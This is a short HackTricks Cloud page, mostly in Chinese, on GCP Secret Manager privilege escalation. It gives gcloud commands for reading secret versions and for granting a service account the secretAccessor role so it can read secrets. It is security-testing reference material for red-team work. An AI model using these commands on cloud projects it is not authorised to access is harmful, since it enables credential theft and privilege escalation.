GCP - Secretmanager Privesc

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 subscription plans!

加入 💬 Discord group 或者 telegram group 或关注我们的 Twitter 🐦 @hacktricks_live.

通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PRs 来分享 hacking tricks。

secretmanager

关于 secretmanager 的更多信息：

GCP - Secrets Manager Enum

`secretmanager.versions.access`

这使你可以访问并从 secret manager 读取 secret，可能有助于提升权限（取决于 secret 中存储的信息）：

获取明文 secret 版本

```bash # Get clear-text of version 1 of secret: "" gcloud secrets versions access 1 --secret="" ```

由于这也是一个 post exploitation 技术，它可以在以下位置找到：

GCP - Secretmanager Post Exploitation

`secretmanager.secrets.setIamPolicy`

这会让你可以从 secret manager 中读取 secrets，例如使用：

Add IAM policy binding to secret

```bash gcloud secrets add-iam-policy-binding \ --member="serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com" \ --role="roles/secretmanager.secretAccessor" ``` 或撤销策略: ```bash gcloud secrets remove-iam-policy-binding \ --member="serviceAccount:@.iam.gserviceaccount.com" \ --role="roles/secretmanager.secretAccessor" ```

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 subscription plans!

加入 💬 Discord group 或者 telegram group 或关注我们的 Twitter 🐦 @hacktricks_live.

通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PRs 来分享 hacking tricks。